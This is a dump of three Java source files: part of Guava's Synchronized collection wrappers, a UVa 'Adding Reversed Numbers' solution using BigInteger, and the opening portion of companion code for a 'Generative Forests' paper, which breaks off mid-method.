NavigableMap<K, V> delegate() {
return (NavigableMap<K, V>) super.delegate();
}
@Override
@CheckForNull
public Map.Entry<K, V> ceilingEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().ceilingEntry(key), mutex);
}
}
@Override
@CheckForNull
public K ceilingKey(K key) {
synchronized (mutex) {
return delegate().ceilingKey(key);
}
}
@CheckForNull transient NavigableSet<K> descendingKeySet;
@Override
public NavigableSet<K> descendingKeySet() {
synchronized (mutex) {
if (descendingKeySet == null) {
return descendingKeySet = Synchronized.navigableSet(delegate().descendingKeySet(), mutex);
}
return descendingKeySet;
}
}
@CheckForNull transient NavigableMap<K, V> descendingMap;
@Override
public NavigableMap<K, V> descendingMap() {
synchronized (mutex) {
if (descendingMap == null) {
return descendingMap = navigableMap(delegate().descendingMap(), mutex);
}
return descendingMap;
}
}
@Override
@CheckForNull
public Map.Entry<K, V> firstEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().firstEntry(), mutex);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> floorEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().floorEntry(key), mutex);
}
}
@Override
@CheckForNull
public K floorKey(K key) {
synchronized (mutex) {
return delegate().floorKey(key);
}
}
@Override
public NavigableMap<K, V> headMap(K toKey, boolean inclusive) {
synchronized (mutex) {
return navigableMap(delegate().headMap(toKey, inclusive), mutex);
}
}
@Override
public SortedMap<K, V> headMap(K toKey) {
return headMap(toKey, false);
}
@Override
@CheckForNull
public Map.Entry<K, V> higherEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().higherEntry(key), mutex);
}
}
@Override
@CheckForNull
public K higherKey(K key) {
synchronized (mutex) {
return delegate().higherKey(key);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> lastEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().lastEntry(), mutex);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> lowerEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().lowerEntry(key), mutex);
}
}
@Override
@CheckForNull
public K lowerKey(K key) {
synchronized (mutex) {
return delegate().lowerKey(key);
}
}
@Override
public Set<K> keySet() {
return navigableKeySet();
}
@CheckForNull transient NavigableSet<K> navigableKeySet;
@Override
public NavigableSet<K> navigableKeySet() {
synchronized (mutex) {
if (navigableKeySet == null) {
return navigableKeySet = Synchronized.navigableSet(delegate().navigableKeySet(), mutex);
}
return navigableKeySet;
}
}
@Override
@CheckForNull
public Map.Entry<K, V> pollFirstEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().pollFirstEntry(), mutex);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> pollLastEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().pollLastEntry(), mutex);
}
}
@Override
public NavigableMap<K, V> subMap(
K fromKey, boolean fromInclusive, K toKey, boolean toInclusive) {
synchronized (mutex) {
return navigableMap(delegate().subMap(fromKey, fromInclusive, toKey, toInclusive), mutex);
}
}
@Override
public SortedMap<K, V> subMap(K fromKey, K toKey) {
return subMap(fromKey, true, toKey, false);
}
@Override
public NavigableMap<K, V> tailMap(K fromKey, boolean inclusive) {
synchronized (mutex) {
return navigableMap(delegate().tailMap(fromKey, inclusive), mutex);
}
}
@Override
public SortedMap<K, V> tailMap(K fromKey) {
return tailMap(fromKey, true);
}
private static final long serialVersionUID = 0;
}
@GwtIncompatible // works but is needed only for NavigableMap
@CheckForNull
private static <K extends @Nullable Object, V extends @Nullable Object>
Map.Entry<K, V> nullableSynchronizedEntry(
@CheckForNull Map.Entry<K, V> entry, @CheckForNull Object mutex) {
if (entry == null) {
return null;
}
return new SynchronizedEntry<>(entry, mutex);
}
@GwtIncompatible // works but is needed only for NavigableMap
static final class SynchronizedEntry<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Map.Entry<K, V> {
SynchronizedEntry(Map.Entry<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked") // guaranteed by the constructor
@Override
Map.Entry<K, V> delegate() {
return (Map.Entry<K, V>) super.delegate();
}
@Override
public boolean equals(@CheckForNull Object obj) {
synchronized (mutex) {
return delegate().equals(obj);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
@Override
public K getKey() {
synchronized (mutex) {
return delegate().getKey();
}
}
@Override
public V getValue() {
synchronized (mutex) {
return delegate().getValue();
}
}
@Override
public V setValue(V value) {
synchronized (mutex) {
return delegate().setValue(value);
}
}
private static final long serialVersionUID = 0;
}
static <E extends @Nullable Object> Queue<E> queue(Queue<E> queue, @CheckForNull Object mutex) {
return (queue instanceof SynchronizedQueue) ? queue : new SynchronizedQueue<E>(queue, mutex);
}
static class SynchronizedQueue<E extends @Nullable Object> extends SynchronizedCollection<E>
implements Queue<E> {
SynchronizedQueue(Queue<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Queue<E> delegate() {
return (Queue<E>) super.delegate();
}
@Override
public E element() {
synchronized (mutex) {
return delegate().element();
}
}
@Override
public boolean offer(E e) {
synchronized (mutex) {
return delegate().offer(e);
}
}
@Override
@CheckForNull
public E peek() {
synchronized (mutex) {
return delegate().peek();
}
}
@Override
@CheckForNull
public E poll() {
synchronized (mutex) {
return delegate().poll();
}
}
@Override
public E remove() {
synchronized (mutex) {
return delegate().remove();
}
}
private static final long serialVersionUID = 0;
}
static <E extends @Nullable Object> Deque<E> deque(Deque<E> deque, @CheckForNull Object mutex) {
return new SynchronizedDeque<>(deque, mutex);
}
static final class SynchronizedDeque<E extends @Nullable Object> extends SynchronizedQueue<E>
implements Deque<E> {
SynchronizedDeque(Deque<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Deque<E> delegate() {
return (Deque<E>) super.delegate();
}
@Override
public void addFirst(E e) {
synchronized (mutex) {
delegate().addFirst(e);
}
}
@Override
public void addLast(E e) {
synchronized (mutex) {
delegate().addLast(e);
}
}
@Override
public boolean offerFirst(E e) {
synchronized (mutex) {
return delegate().offerFirst(e);
}
}
@Override
public boolean offerLast(E e) {
synchronized (mutex) {
return delegate().offerLast(e);
}
}
@Override
public E removeFirst() {
synchronized (mutex) {
return delegate().removeFirst();
}
}
@Override
public E removeLast() {
synchronized (mutex) {
return delegate().removeLast();
}
}
@Override
@CheckForNull
public E pollFirst() {
synchronized (mutex) {
return delegate().pollFirst();
}
}
@Override
@CheckForNull
public E pollLast() {
synchronized (mutex) {
return delegate().pollLast();
}
}
@Override
public E getFirst() {
synchronized (mutex) {
return delegate().getFirst();
}
}
@Override
public E getLast() {
synchronized (mutex) {
return delegate().getLast();
}
}
@Override
@CheckForNull
public E peekFirst() {
synchronized (mutex) {
return delegate().peekFirst();
}
}
@Override
@CheckForNull
public E peekLast() {
synchronized (mutex) {
return delegate().peekLast();
}
}
@Override
public boolean removeFirstOccurrence(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().removeFirstOccurrence(o);
}
}
@Override
public boolean removeLastOccurrence(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().removeLastOccurrence(o);
}
}
@Override
public void push(E e) {
synchronized (mutex) {
delegate().push(e);
}
}
@Override
public E pop() {
synchronized (mutex) {
return delegate().pop();
}
}
@Override
public Iterator<E> descendingIterator() {
synchronized (mutex) {
return delegate().descendingIterator();
}
}
private static final long serialVersionUID = 0;
}
static <R extends @Nullable Object, C extends @Nullable Object, V extends @Nullable Object>
Table<R, C, V> table(Table<R, C, V> table, @CheckForNull Object mutex) {
return new SynchronizedTable<>(table, mutex);
}
static final class SynchronizedTable<
R extends @Nullable Object, C extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Table<R, C, V> {
SynchronizedTable(Table<R, C, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked")
@Override
Table<R, C, V> delegate() {
return (Table<R, C, V>) super.delegate();
}
@Override
public boolean contains(@CheckForNull Object rowKey, @CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().contains(rowKey, columnKey);
}
}
@Override
public boolean containsRow(@CheckForNull Object rowKey) {
synchronized (mutex) {
return delegate().containsRow(rowKey);
}
}
@Override
public boolean containsColumn(@CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().containsColumn(columnKey);
}
}
@Override
public boolean containsValue(@CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsValue(value);
}
}
@Override
@CheckForNull
public V get(@CheckForNull Object rowKey, @CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().get(rowKey, columnKey);
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
@CheckForNull
public V put(
@ParametricNullness R rowKey,
@ParametricNullness C columnKey,
@ParametricNullness V value) {
synchronized (mutex) {
return delegate().put(rowKey, columnKey, value);
}
}
@Override
public void putAll(Table<? extends R, ? extends C, ? extends V> table) {
synchronized (mutex) {
delegate().putAll(table);
}
}
@Override
@CheckForNull
public V remove(@CheckForNull Object rowKey, @CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().remove(rowKey, columnKey);
}
}
@Override
public Map<C, V> row(@ParametricNullness R rowKey) {
synchronized (mutex) {
return map(delegate().row(rowKey), mutex);
}
}
@Override
public Map<R, V> column(@ParametricNullness C columnKey) {
synchronized (mutex) {
return map(delegate().column(columnKey), mutex);
}
}
@Override
public Set<Cell<R, C, V>> cellSet() {
synchronized (mutex) {
return set(delegate().cellSet(), mutex);
}
}
@Override
public Set<R> rowKeySet() {
synchronized (mutex) {
return set(delegate().rowKeySet(), mutex);
}
}
@Override
public Set<C> columnKeySet() {
synchronized (mutex) {
return set(delegate().columnKeySet(), mutex);
}
}
@Override
public Collection<V> values() {
synchronized (mutex) {
return collection(delegate().values(), mutex);
}
}
@Override
public Map<R, Map<C, V>> rowMap() {
synchronized (mutex) {
return map(
Maps.transformValues(
delegate().rowMap(),
new com.google.common.base.Function<Map<C, V>, Map<C, V>>() {
@Override
public Map<C, V> apply(Map<C, V> t) {
return map(t, mutex);
}
}),
mutex);
}
}
@Override
public Map<C, Map<R, V>> columnMap() {
synchronized (mutex) {
return map(
Maps.transformValues(
delegate().columnMap(),
new com.google.common.base.Function<Map<R, V>, Map<R, V>>() {
@Override
public Map<R, V> apply(Map<R, V> t) {
return map(t, mutex);
}
}),
mutex);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
@Override
public boolean equals(@CheckForNull Object obj) {
if (this == obj) {
return true;
}
synchronized (mutex) {
return delegate().equals(obj);
}
}
}
}
| google/guava | android/guava/src/com/google/common/collect/Synchronized.java |
1,173 | /**
* The Antique Comedians of Malidinesia prefer comedies to tragedies. Unfortunately, most of the ancient
* plays are tragedies. Therefore the dramatic advisor of ACM has decided to transfigure some tragedies
* into comedies. Obviously, this work is very hard because the basic sense of the play must be kept intact,
* although all the things change to their opposites. For example the numbers: if any number appears in
* the tragedy, it must be converted to its reversed form before being accepted into the comedy play.
* Reversed number is a number written in arabic numerals but the order of digits is reversed. The
* first digit becomes last and vice versa. For example, if the main hero had 1245 strawberries in the
* tragedy, he has 5421 of them now. Note that all the leading zeros are omitted. That means if the
* number ends with a zero, the zero is lost by reversing (e.g. 1200 gives 21). Also note that the reversed
* number never has any trailing zeros.
* ACM needs to calculate with reversed numbers. Your task is to add two reversed numbers and
* output their reversed sum. Of course, the result is not unique because any particular number is a
* reversed form of several numbers (e.g. 21 could be 12, 120 or 1200 before reversing). Thus we must
* assume that no zeros were lost by reversing (e.g. assume that the original number was 12).
* Input
* The input consists of N cases. The first line of the input contains only positive integer N. Then follow
* the cases. Each case consists of exactly one line with two positive integers separated by space. These
* are the reversed numbers you are to add. Numbers will be at most 200 characters long.
* Output
* For each case, print exactly one line containing only one integer — the reversed sum of two reversed
* numbers. Omit any leading zeros in the output.
* Sample Input
* 3
* 24 1
* 4358 754
* 305 794
* Sample Output
* 34
* 1998
* 1
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=654
import java.math.BigInteger;
import java.util.Scanner;
public class AddingReversedNumbers {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int numberOfTestCases = input.nextInt();
while (numberOfTestCases != 0) {
BigInteger first = input.nextBigInteger();
BigInteger second = input.nextBigInteger();
StringBuilder firstString = new StringBuilder(first + "");
StringBuilder secondString = new StringBuilder(second + "");
BigInteger firstReversed = new BigInteger(firstString.reverse()
.toString());
BigInteger secondReversed = new BigInteger(secondString.reverse()
.toString());
BigInteger result = firstReversed.add(secondReversed);
String resultReversed = new StringBuilder(result + "").reverse()
.toString();
System.out.println(resultReversed.replaceFirst("^0*", ""));
numberOfTestCases--;
}
}
}
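// Illustrative sketch (not part of the original submission): the same
// reverse -> add -> reverse idea traced on the sample case "24 1" with plain
// long arithmetic. The names ReversedSumSketch and reverseDigits are
// hypothetical helpers for illustration only; the accepted solution above
// keeps BigInteger because inputs may be up to 200 digits long.
class ReversedSumSketch {
    static long reverseDigits(long n) {
        long r = 0;
        while (n > 0) {
            r = r * 10 + n % 10; // move the last digit of n onto the end of r
            n /= 10;
        }
        return r; // leading zeros of the reversed result vanish automatically
    }

    public static void main(String[] args) {
        long a = 24, b = 1;
        long sum = reverseDigits(a) + reverseDigits(b); // 42 + 1 = 43
        System.out.println(reverseDigits(sum)); // prints 34, matching the sample output
    }
}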
| kdn251/interviews | uva/AddingReversedNumbers.java |
1,175 | // Companion Code to the paper "Generative Forests" by R. Nock and M. Guillame-Bert.
import java.io.*;
import java.util.*;
/**************************************************************************************************************************************
* Class Support
 * represents a support: one domain per feature, together with its volume and its weight under the dataset's uniform distribution
*****/
class Support implements Debuggable{
private Vector <Feature> features;
double volume = -1.0;
double weight_uniform_distribution = -1.0;
Support(){
features = null;
}
Support(Vector <Feature> vf, Dataset ds){
features = new Vector <>();
int i;
double wud = 1.0, v = 1.0;
for (i=0;i<vf.size();i++){
if (vf.elementAt(i) != null){
features.addElement(Feature.copyOf(vf.elementAt(i)));
v *= features.elementAt(i).length();
wud *= features.elementAt(i).length() / ds.features.elementAt(i).length();
}else
features.addElement(null); // option for Missing Data Imputation
}
volume = v;
weight_uniform_distribution = wud;
}
public String toString(){
int i;
String ret = "";
for (i = 0; i<features.size();i++){
if (features.elementAt(i) == null)
ret += "[ null ]"; // option for Missing Data Imputation
else
ret += features.elementAt(i).toShortString();
if (i<features.size() - 1)
ret += " X ";
}
ret += "{{" + volume + "}}{" + weight_uniform_distribution + "}";
return ret;
}
public static Support[] SPLIT_SUPPORT(Dataset ds, Support s, FeatureTest ft, int feature_split_index){
if ( (s.volume == -1.0) || (s.weight_uniform_distribution == -1.0) )
Dataset.perror("Support.class :: SPLIT_SUPPORT cannot split, negative weights");
Feature feature_in_measured_support = s.feature(feature_split_index);
Support[] ret = new Support[2];
FeatureTest f = FeatureTest.copyOf(ft, feature_in_measured_support);
Feature [] split_feat;
String tvb = f.check_trivial_branching(ds, feature_in_measured_support, true);
if (tvb.equals(FeatureTest.TRIVIAL_BRANCHING_LEFT)){
ret[0] = Support.copyOf(s);
ret[1] = null; //right
}else if (tvb.equals(FeatureTest.TRIVIAL_BRANCHING_RIGHT)){
ret[0] = null; //left
ret[1] = Support.copyOf(s);
}else{
ret[0] = Support.copyOf(s);
ret[1] = Support.copyOf(s);
split_feat = f.split_feature(ds, feature_in_measured_support, false, false);
ret[0].setFeatureAt(split_feat[0], feature_split_index);
ret[1].setFeatureAt(split_feat[1], feature_split_index);
}
return ret;
}
public Support[] split_support(int feature_index, Feature [] new_features){
// split support at a leaf, ensuring consistency
if ( (volume == -1.0) || (weight_uniform_distribution == -1.0) )
Dataset.perror("Support.class :: split_support cannot split, negative weights");
Feature.TEST_UNION(features.elementAt(feature_index), new_features[0], new_features[1]);
Support [] ret = new Support[2];
ret[0] = Support.copyOf(this);
ret[1] = Support.copyOf(this);
ret[0].setFeatureAt(new_features[0], feature_index);
ret[1].setFeatureAt(new_features[1], feature_index);
return ret;
}
public static Support copyOf(Support vc){
if ( (vc.volume == -1.0) || (vc.weight_uniform_distribution == -1.0) )
Dataset.perror("Support.class :: copyOf cannot copy, negative weights");
Support ret = new Support();
ret.features = new Vector <>();
int i;
for (i=0;i<vc.features.size();i++)
if (vc.features.elementAt(i) != null){
ret.features.addElement(Feature.copyOf(vc.features.elementAt(i)));
}else
ret.features.addElement(null);
ret.volume = vc.volume;
ret.weight_uniform_distribution = vc.weight_uniform_distribution;
return ret;
}
public static Support CAP(Vector <Node> nodes, boolean ensure_non_zero_measure, Dataset ds){
// cheaper option to compute the intersection of supports
// proceeds by feature; if one \cap returns null, returns null
Feature [] f_cur;
Vector <Feature> ret = new Vector <>();
Feature f;
int i, j;
for (i=0;i<nodes.elementAt(0).node_support.dim();i++){
f_cur = new Feature[nodes.size()];
for (j=0;j<nodes.size();j++){
if (nodes.elementAt(j).node_support.dim() != ds.features.size())
Dataset.perror("Support.class :: cannot compute CAP");
f_cur[j] = nodes.elementAt(j).node_support.feature(i);
}
f = Feature.CAP(f_cur, ensure_non_zero_measure);
if (f == null)
return null;
else
ret.addElement(f);
}
return new Support(ret, ds);
}
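  // Illustrative note (not in the original code): if two nodes' supports on a
  // continuous feature are [0, 5] and [3, 8], CAP keeps [3, 5] for that feature;
  // as soon as one per-feature intersection is empty (Feature.CAP returns null),
  // the whole support intersection is reported as empty by returning null.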
public Support cap(Support t, boolean ensure_non_zero_measure){
// returns the intersection support: EXPENSIVE, prefer the static CAP
Support ret = new Support();
ret.volume = volume;
ret.weight_uniform_distribution = weight_uniform_distribution;
ret.features = new Vector <>();
int i;
Feature df;
double rat;
for (i=0;i<dim();i++){
df = features.elementAt(i).cap(t.feature(i), ensure_non_zero_measure);
if (df == null)
return null;
ret.features.addElement(df);
if (features.elementAt(i).length() == 0.0)
Dataset.perror("Support.class :: cannot cap support, /0");
rat = df.length() / features.elementAt(i).length();
ret.volume *= rat;
ret.weight_uniform_distribution *= rat;
}
return ret;
}
public static boolean SUPPORT_INTERSECTION_IS_EMPTY(Vector <Node> nodes, boolean ensure_non_zero_measure, Dataset ds){
Support ret = Support.CAP(nodes, ensure_non_zero_measure, ds);
if (ret == null)
return true;
return false;
}
public Feature feature(int i){
return features.elementAt(i);
}
public void setFeatureAt(Feature f, int i){
double rat;
if (features.elementAt(i) == null)
Dataset.perror("Support.class :: trouble in missing data imputation");
if (features.elementAt(i).length() == 0.0)
Dataset.perror("Feature.class :: cannot uppdate vol / wud: /0");
rat = f.length() / features.elementAt(i).length();
volume *= rat;
weight_uniform_distribution *= rat;
features.setElementAt(f, i);
}
public void setNullFeatureAt(int i, Dataset ds){
double rat;
if (features.elementAt(i).length() == 0.0)
Dataset.perror("Feature.class :: cannot uppdate vol / wud: /0");
rat = ds.features.elementAt(i).length() / features.elementAt(i).length();
volume /= features.elementAt(i).length();
weight_uniform_distribution *= rat;
features.setElementAt(null, i);
}
public int dim(){
return features.size();
}
public boolean is_subset_of(Support t){
//returns true iff this \subseteq t
if (dim() != t.dim())
Dataset.perror("Feature.class :: supports not comparable");
int i;
for (i=0;i<features.size();i++)
if (!Feature.IS_SUBFEATURE(features.elementAt(i), t.feature(i)))
return false;
return true;
}
public boolean observation_known_values_in_support(Observation e){
// return true iff all SPECIFIED attributes in e are in the corresponding support feature's domain
// ignores unspecified attributes
int i;
for (i=0;i<dim();i++){
if ( (!e.typed_features.elementAt(i).type.equals(Feature.UNKNOWN_VALUE)) && (!Feature.OBSERVATION_MATCHES_FEATURE(e, features.elementAt(i), i)) )
return false;
}
return true;
}
}
/**************************************************************************************************************************************
* Class FeatureTest
* provides encapsulation for sets relevant to feature tests
 * a FeatureTest is used to compute the branching probabilities if the value of feature this.name is unknown in an observation
*****/
class FeatureTest implements Debuggable{
// private to prevent direct access
public static String TRIVIAL_BRANCHING_LEFT = "TRIVIAL_BRANCHING_LEFT",
TRIVIAL_BRANCHING_RIGHT = "TRIVIAL_BRANCHING_RIGHT",
NO_TRIVIAL_BRANCHING = "NO_TRIVIAL_BRANCHING";
//private Feature myFeature;
// removed and replaced by the name of the feature
public String name;
private double double_test;
private int int_test;
private BoolArray boolarray_to_string_test;
// do not store Strings but booleans:
// MUST HAVE LENGTH = the size of the feature's domain in Dataset
String type;
public static boolean HAS_AT_LEAST_ONE_FEATURE_TEST(Feature f, Dataset ds){
if (!IS_SPLITTABLE(f))
return false;
if ( (Feature.IS_CONTINUOUS(f.type)) && (f.dmax - f.dmin <= 0.0) )
return false;
if ( (Feature.IS_INTEGER(f.type)) && (f.imax - f.imin <= 0) )
return false;
if ( (Feature.IS_NOMINAL(f.type)) && (f.modalities.size() <= 1) )
return false;
return true;
}
public static Vector<FeatureTest> ALL_FEATURE_TESTS(Feature f, Dataset ds){
// if continuous, list of evenly spaced thresholds (ties)
// if nominal, list of non-empty proper subsets of the modalities
// if integer, list of candidate integer thresholds
if (!IS_SPLITTABLE(f))
return null;
Vector <FeatureTest> v = new Vector<FeatureTest> ();
int i, j;
if (Feature.IS_CONTINUOUS(f.type)){
if (f.dmax - f.dmin <= 0.0){
v = null;
}else{
double vmin = f.dmin;
double vmax = f.dmax;
double delta = (vmax - vmin) / ( (double) (Feature.NUMBER_CONTINUOUS_TIES + 1) );
double vcur = vmin + delta;
for (i=0;i<Feature.NUMBER_CONTINUOUS_TIES;i++){
v.add(new FeatureTest(vcur, f));
vcur += delta;
}
}
}else if (Feature.IS_INTEGER(f.type)){
if (f.imax - f.imin <= 0){
v = null;
}else{
int vmin = f.imin;
int nvals = f.imax - f.imin;
for (i=0;i<nvals;i++){
v.add(new FeatureTest(vmin + i, f));
}
}
}else if (Feature.IS_NOMINAL(f.type)){
Vector <BoolArray> all_boolarrays_not_rescaled;
BoolArray dumba, baind;
Feature reference_in_ds = ds.features.elementAt(ds.indexOfFeature(f.name));
all_boolarrays_not_rescaled = Utils.ALL_NON_TRIVIAL_BOOLARRAYS(f.modalities.size(), Utils.GUESS_MAX_TRUE_IN_BOOLARRAY(f.modalities.size()));
//making sure the BoolArrays tests are re-indexed on DS feature modalities
if (all_boolarrays_not_rescaled.size() > 0){
for (i=0;i<all_boolarrays_not_rescaled.size();i++){
dumba = new BoolArray(reference_in_ds.modalities.size());
baind = all_boolarrays_not_rescaled.elementAt(i);
for (j=0;j<baind.size();j++)
if (baind.get(j))
dumba.set(reference_in_ds.modalities.indexOf(f.modalities.elementAt(j)), true);
v.add(new FeatureTest(dumba, f));
}
}else
v = null;
}
return v;
}
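  // Illustrative note (assuming Feature.NUMBER_CONTINUOUS_TIES == 9; the actual
  // value is defined elsewhere in the companion code): for a CONTINUOUS feature
  // with dmin = 0.0 and dmax = 1.0 this enumerates thresholds 0.1, 0.2, ..., 0.9;
  // for an INTEGER feature with imin = 2 and imax = 5 it enumerates the tests
  // "<= 2", "<= 3", "<= 4"; for a NOMINAL feature it enumerates non-trivial
  // subsets of the modalities, re-indexed on the Dataset's modality order.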
public static String DISPLAY_TESTS(Vector<FeatureTest> ft, boolean show_all){
int max_display = 5;
if (show_all)
max_display = ft.size();
int i, j;
String v = "{";
Vector <String> dv;
if (ft != null){
if (ft.size() == 0)
Dataset.perror("Feature.class :: avoid empty but non null test sets");
for (i =0;i<ft.size();i++){
if (i < max_display){
v += ft.elementAt(i);
if (i<ft.size()-1)
v += ", ";
}else{
v += "... ";
break;
}
}
}
v += "}";
return v;
}
public static boolean IS_SPLITTABLE(Feature f){
if (Feature.IS_NOMINAL(f.type)){
if (f.modalities == null)
return false;
if (f.modalities.size() <= 1)
return false;
}else if (Feature.IS_CONTINUOUS(f.type)){
if (f.dmin >= f.dmax)
return false;
}else if (Feature.IS_INTEGER(f.type)){
if (f.imin >= f.imax - 1)
return false;
}
return true;
}
FeatureTest(Feature f){
double_test = Feature.FORBIDDEN_VALUE;
int_test = Feature.FORBIDDEN_VALUE;
boolarray_to_string_test = null;
name = f.name;
}
FeatureTest(double d, Feature f){
this(f);
double_test = d;
type = Feature.CONTINUOUS;
}
FeatureTest(int i, Feature f){
this(f);
int_test = i;
type = Feature.INTEGER;
}
FeatureTest(BoolArray b, Feature f){
this(f);
boolarray_to_string_test = b.duplicate();
type = Feature.NOMINAL;
}
public String check_trivial_branching(Dataset ds, Feature f, boolean prevent_zero_measure){
// checks whether the split induces a trivial branching on f
// if prevent_zero_measure AND f is continuous, adds double_test == f.dmin for TRIVIAL_BRANCHING_RIGHT (prevents zero measure after eventual split)
if ( (!f.type.equals(type)) || (!f.name.equals(name)) )
Dataset.perror("FeatureTest.class :: checking trivial branching on wrong type / name");
String ret = null;
if (Feature.IS_CONTINUOUS(type)){
if ( (double_test < f.dmin) || ( (prevent_zero_measure) && (double_test <= f.dmin) ) )
ret = TRIVIAL_BRANCHING_RIGHT;
else if (double_test >= f.dmax)
ret = TRIVIAL_BRANCHING_LEFT;
else
ret = NO_TRIVIAL_BRANCHING;
}else if (Feature.IS_INTEGER(type)){
if (int_test < f.imin)
ret = TRIVIAL_BRANCHING_RIGHT;
else if (int_test >= f.imax)
ret = TRIVIAL_BRANCHING_LEFT;
else
ret = NO_TRIVIAL_BRANCHING;
}else if (Feature.IS_NOMINAL(type)){
Vector <String> moda = getStringTest(ds); // get all String corresponding to the test
if (moda == null)
Dataset.perror("Feature.class :: no test for nominal feature " + name);
boolean all_my_moda_outside_f = true, all_f_moda_in_mine = true;
int i;
for (i=0;i<moda.size();i++)
if (f.modalities.contains(moda.elementAt(i)))
all_my_moda_outside_f = false;
for (i=0;i<f.modalities.size();i++)
if (!moda.contains(f.modalities.elementAt(i)))
all_f_moda_in_mine = false;
if ( (all_my_moda_outside_f) && (all_f_moda_in_mine) )
Dataset.perror("Feature.class :: inconsistency in check_trivial_branching");
if (all_my_moda_outside_f)
ret = TRIVIAL_BRANCHING_RIGHT;
else if (all_f_moda_in_mine)
ret = TRIVIAL_BRANCHING_LEFT;
else
ret = NO_TRIVIAL_BRANCHING;
}
return ret;
}
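  // Worked example (illustrative, not in the original code): for a CONTINUOUS
  // feature f with dmin = 0.0 and dmax = 10.0, a test with double_test = 12.0
  // yields TRIVIAL_BRANCHING_LEFT (every value of f satisfies "<= 12.0"), a test
  // with double_test = -1.0 yields TRIVIAL_BRANCHING_RIGHT, and a test with
  // double_test = 4.0 yields NO_TRIVIAL_BRANCHING.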
public double [] rapid_stats_split_measure_hard(LocalEmpiricalMeasure parent_measure, Dataset ds, Feature f_split, boolean unspecified_attribute_handling_biased){
// simplified version of split_measure_hard: just returns statistics
double [] ret = new double[2];
int i, index_feature_in_e = ds.indexOfFeature(name);
for (i=0;i<parent_measure.observations_indexes.length;i++){
if ((!Observation.FEATURE_IS_UNKNOWN(
ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]),
index_feature_in_e))
&& (!type.equals(
ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type
+ ")");
if (observation_goes_left(ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]), ds, f_split, unspecified_attribute_handling_biased))
ret[0] += 1.0;
else
ret[1] += 1.0;
}
return ret;
}
public LocalEmpiricalMeasure [] split_measure_hard(LocalEmpiricalMeasure parent_measure, Dataset ds, Feature f_split, boolean unspecified_attribute_handling_biased){
// hard split of the measure according to the feature
if (parent_measure.observations_indexes == null)
return null;
int index_feature_in_e = ds.indexOfFeature(name);
Vector <Integer> left_indexes = new Vector<>();
Vector <Integer> right_indexes = new Vector<>();
LocalEmpiricalMeasure [] ret;
int i;
for (i=0;i<parent_measure.observations_indexes.length;i++){
if ((!Observation.FEATURE_IS_UNKNOWN(
ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]),
index_feature_in_e))
&& (!type.equals(
ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type)))
Dataset.perror(
"FeatureTest.class :: type mismatch to split examples ( "
+ type
+ " != "
+ ds.observations_from_file
.elementAt(parent_measure.observations_indexes[i])
.typed_features
.elementAt(index_feature_in_e)
.type
+ ")");
if (observation_goes_left(ds.observations_from_file.elementAt(parent_measure.observations_indexes[i]), ds, f_split, unspecified_attribute_handling_biased))
left_indexes.addElement(new Integer(parent_measure.observations_indexes[i]));
else
right_indexes.addElement(new Integer(parent_measure.observations_indexes[i]));
}
ret = new LocalEmpiricalMeasure[2];
ret[0] = new LocalEmpiricalMeasure(left_indexes.size());
ret[1] = new LocalEmpiricalMeasure(right_indexes.size());
int [] tab_left, tab_right;
tab_left = new int[left_indexes.size()];
tab_right = new int[right_indexes.size()];
for (i=0;i<left_indexes.size();i++)
tab_left[i] = left_indexes.elementAt(i).intValue();
for (i=0;i<right_indexes.size();i++)
tab_right[i] = right_indexes.elementAt(i).intValue();
// check size sum
if (tab_left.length + tab_right.length != parent_measure.observations_indexes.length)
Dataset.perror(
"FeatureTest.class :: size mismatch to split examples ( "
+ tab_left.length
+ " + "
+ tab_right.length
+ " != "
+ parent_measure.observations_indexes.length
+ ")");
ret[0].init_indexes(tab_left);
ret[1].init_indexes(tab_right);
return ret;
}
public LocalEmpiricalMeasure [] split_measure_soft(LocalEmpiricalMeasure parent_measure, Dataset ds, Feature f_split){
// soft split of the measure according to the feature
if (parent_measure.observations_indexes == null)
return null;
